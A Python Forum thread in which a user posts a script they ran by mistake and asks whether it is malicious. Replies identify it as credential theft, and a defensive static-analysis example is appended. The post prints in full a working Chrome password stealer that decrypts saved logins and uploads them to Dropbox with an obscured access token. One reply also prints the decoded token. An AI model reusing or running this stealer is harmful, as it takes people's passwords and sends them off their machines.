Help! I accidentally ran a file without checking the code - Printable Version
+- Python Forum (https://python-forum.io)
+-- Forum: Python Coding (https://python-forum.io/forum-7.html)
+--- Forum: General Coding Help (https://python-forum.io/forum-8.html)
+--- Thread: Help! I accidentally ran a file without checking the code (/thread-30988.html)
Help! I accidentally ran a file without checking the code - scaryzane - Nov-16-2020

So I accidentally ran this file today, and didn't check the Python code. Can anybody tell me if this code is malicious?

    import os
    import json
    import base64
    import sqlite3
    import win32crypt
    from Crypto.Cipher import AES
    import shutil
    import dropbox
    from codecs import encode
    import getpass


    def upload_passfile():
        access_token = encode("pYTjP6sifCxNNNNNNNNNNDIRXrA2kfdgl93KiKK1ddIgXDbvfwWFMmDlTyB1EP0i", 'rot13')
        file_from = "rc.txt"
        file_to = "/passwords/" + str(getpass.getuser()) + "'s_passwords.txt"
        client = dropbox.Dropbox(access_token)
        client.files_upload(open(file_from, "rb").read(), file_to, dropbox.files.WriteMode.overwrite, mute=True)


    def get_master_key():
        with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
            local_state = f.read()
            local_state = json.loads(local_state)
        master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
        master_key = master_key[5:]  # removing DPAPI
        master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]  # sqlite3 decryption
        return master_key


    def decrypt_payload(cipher, payload):
        return cipher.decrypt(payload)


    def generate_cipher(aes_key, iv):
        return AES.new(aes_key, AES.MODE_GCM, iv)


    def decrypt_password(buff, master_key):
        try:
            iv = buff[3:15]
            payload = buff[15:]
            cipher = generate_cipher(master_key, iv)
            decrypted_pass = decrypt_payload(cipher, payload)
            decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
            return decrypted_pass
        except Exception as e:
            decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0)  # Tuple
            return str(decrypted_pass[1])


    if __name__ == '__main__':
        master_key = get_master_key()
        login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
        shutil.copy2(login_db, "Loginvault.db")  # making a temp copy since Login Data DB is locked while Chrome is running
        conn = sqlite3.connect("Loginvault.db")
        cursor = conn.cursor()
        try:
            cursor.execute("SELECT action_url, username_value, password_value FROM logins")
            passfile = open("rc.txt", "w")
            for r in cursor.fetchall():
                url = r[0]
                username = r[1]
                encrypted_password = r[2]
                decrypted_password = decrypt_password(encrypted_password, master_key)
                passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
            passfile.close()
            conn.close()
        except Exception as e:
            print(e)
        upload_passfile()
        os.remove("rc.txt")
        os.remove("Loginvault.db")

RE: Help! I accidentally ran a file without checking the code - jefsummers - Nov-16-2020

Without deep analysis, this looks like it is trying to obtain your passwords. I would worry, and change all my critical passwords NOW.

RE: Help! I accidentally ran a file without checking the code - iiAsez - Dec-25-2020

I had this issue too, but after some code analysis I found out that it only retrieves some of your passwords, so I suggest that you change your most important ones, or all of them (recommended).

RE: Help! I accidentally ran a file without checking the code - DeaD_EyE - Dec-25-2020

Hm, the hacker should have used pathlib, and his hack works only on Windows.

One thing is strange. Where does the dropbox module come from? This hack can only work if the dropbox dependency is installed in your current Python interpreter.

PS: His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v

RE: Help! I accidentally ran a file without checking the code - buran - Dec-25-2020

(Dec-25-2020, 02:10 PM)DeaD_EyE Wrote: PS:
Probably you can report them. It most likely violates Dropbox ToS.

RE: Help! I accidentally ran a file without checking the code - DeaD_EyE - Dec-30-2020

They are investigating now, but the team is not allowed to visit external URLs. So I provided them with the source code today as well.
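The question opening this thread ("is this code malicious?") and DeaD_EyE's observations (Windows-only, the dropbox dependency, the rot13-wrapped access token) can be answered without running the file. The static triage below is an added example, not code from the thread: it parses a Python source with the ast module and flags the indicators the posted script combines. The indicator tables are an assumption tuned to this script, and SAMPLE is a constructed stand-in with a placeholder token rather than the posted file.

```python
import ast
from codecs import decode

# Indicator tables tuned to the script in this thread (assumption: not a general-purpose detector).
SUSPECT_IMPORTS = {"win32crypt": "Windows DPAPI access", "dropbox": "cloud upload client",
                   "sqlite3": "browser database access"}
SUSPECT_STRINGS = {"Local State": "Chrome key store", "Login Data": "Chrome password store",
                   "os_crypt": "Chrome encrypted-key field"}
SUSPECT_CALLS = {"CryptUnprotectData": "DPAPI decryption", "files_upload": "upload off the host",
                 "remove": "deletion of working files"}

# Constructed stand-in with the same shape as the posted script; the token is a placeholder.
SAMPLE = '''
import os, sqlite3, win32crypt, dropbox
from codecs import encode
state = os.environ["USERPROFILE"] + "/AppData/Local/Google/Chrome/User Data/Local State"
db = os.environ["USERPROFILE"] + "/AppData/Local/Google/Chrome/User Data/default/Login Data"
key = win32crypt.CryptUnprotectData(b"...", None, None, None, 0)[1]
dropbox.Dropbox(encode("GBXRA-CYNPRUBYQRE", "rot13")).files_upload(b"", "/p.txt")
os.remove("rc.txt")
'''


def triage(source):
    """Return human-readable findings for one Python source text; parses only, never executes it."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            mods = [a.name.split(".")[0] for a in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [(node.module or "").split(".")[0]]
        else:
            mods = []
        findings += [f"import {m}: {SUSPECT_IMPORTS[m]}" for m in mods if m in SUSPECT_IMPORTS]
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            findings += [f"string {k!r}: {v}" for k, v in SUSPECT_STRINGS.items() if k in node.value]
        if isinstance(node, ast.Call):
            f = node.func
            name = f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")
            if name in SUSPECT_CALLS:
                findings.append(f"call {name}(): {SUSPECT_CALLS[name]}")
            # encode(<literal>, 'rot13') only hides a value from a casual reader; recover it for the report
            if name == "encode" and len(node.args) == 2 and all(isinstance(a, ast.Constant) for a in node.args) \
                    and node.args[1].value == "rot13":
                findings.append(f"rot13-wrapped literal decodes to {decode(node.args[0].value, 'rot13')!r}")
    return findings


if __name__ == "__main__":
    print("\n".join(triage(SAMPLE)))
```

Point triage() at the text of any downloaded script before running it; an empty list means none of these indicators were found, not that the file is safe.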